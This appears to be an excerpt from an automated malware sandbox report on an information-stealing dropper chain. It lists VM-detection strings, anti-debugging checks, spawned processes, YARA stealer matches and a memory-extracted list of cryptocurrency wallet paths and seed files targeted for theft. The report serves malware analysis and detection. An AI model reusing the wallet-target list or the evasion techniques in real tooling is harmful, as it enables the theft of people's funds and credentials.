                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: ,Windows 2016 Server Standard without Hyper-V
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 2012 Server Standard without Hyper-V (core)
                        Source: Amcache.hve.10.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
                        Source: explorti.exe, 00000003.00000002.4096195243.0000000001488000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                        Source: 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: VBoxService.exe
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 8.1 Server Standard without Hyper-V
                        Source: Amcache.hve.10.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: *Windows 10 Server Standard without Hyper-V
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
                        Source: 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: VMWare
                        Source: Amcache.hve.10.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: #Windows 11 Microsoft Hyper-V Server
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSystem information queried: ModuleInformationJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeProcess information queried: ProcessInformationJump to behavior

                        Anti Debugging

                        barindex
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeThread information set: HideFromDebugger
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeThread information set: HideFromDebugger
                        Source: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exeThread information set: HideFromDebugger
                        Source: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exeOpen window title or class name: regmonclass
                        Source: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exeOpen window title or class name: gbdyllo
                        Source: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exeOpen window title or class name: procmon_window_class
                        Source: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exeOpen window title or class name: ollydbg
                        Source: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exeOpen window title or class name: filemonclass
                        Source: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exeFile opened: NTICE
                        Source: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exeFile opened: SICE
                        Source: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exeFile opened: SIWVID
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exeProcess queried: DebugPort
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeCode function: 0_2_05340DC0 rdtsc 0_2_05340DC0
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0B5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,4_2_6C0B5FF0
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0BC410 LoadLibraryW,GetProcAddress,FreeLibrary,4_2_6C0BC410
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 3_2_005F643B mov eax, dword ptr fs:[00000030h]3_2_005F643B
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 3_2_005FA1A2 mov eax, dword ptr fs:[00000030h]3_2_005FA1A2
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C08B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6C08B66C
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C08B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6C08B1F7
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess created: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exe "C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess created: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exe "C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\CFCBKKKJJJ.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exe "C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\AAFIIJDAAA.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exe "C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exe"
                        Source: explorti.exe, explorti.exe, 00000003.00000002.4093184029.00000000007A4000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Program Manager
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 3_2_005DD2E8 cpuid 3_2_005DD2E8
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
                        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 3_2_005DCAED GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,3_2_005DCAED
                        Source: Amcache.hve.10.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                        Source: Amcache.hve.10.drBinary or memory string: msmpeng.exe
                        Source: Amcache.hve.10.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                        Source: Amcache.hve.10.drBinary or memory string: MsMpEng.exe

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 2.2.explorti.exe.5c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.GIEHIDHJDB.exe.aa0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.explorti.exe.5c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 20.2.CBFIIEHJDB.exe.250000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.So7a8eQerR.exe.950000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.explorti.exe.5c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000003.00000002.4092705885.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1637490155.0000000005120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000003.1727956863.00000000051D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000003.3329811617.00000000051F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1961910471.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.1705047766.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000003.1672963903.0000000005110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000002.3370645589.0000000000251000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000003.1664831569.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.1713328912.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.2002426220.0000000000AA1000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1677709816.0000000000951000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 15.2.586ef238b2.exe.200000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.37664d9843.exe.ce0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000004.00000002.1957654994.0000000000CE1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.3328030922.0000000000201000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.3332366463.0000000001745000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1962741464.0000000001EDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 37664d9843.exe PID: 8076, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: 586ef238b2.exe PID: 7592, type: MEMORYSTR
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 15.2.586ef238b2.exe.200000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.37664d9843.exe.ce0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000004.00000002.1957654994.0000000000CE1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.3328030922.0000000000201000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 37664d9843.exe PID: 8076, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: 586ef238b2.exe PID: 7592, type: MEMORYSTR
                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000002041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000002041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000002041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
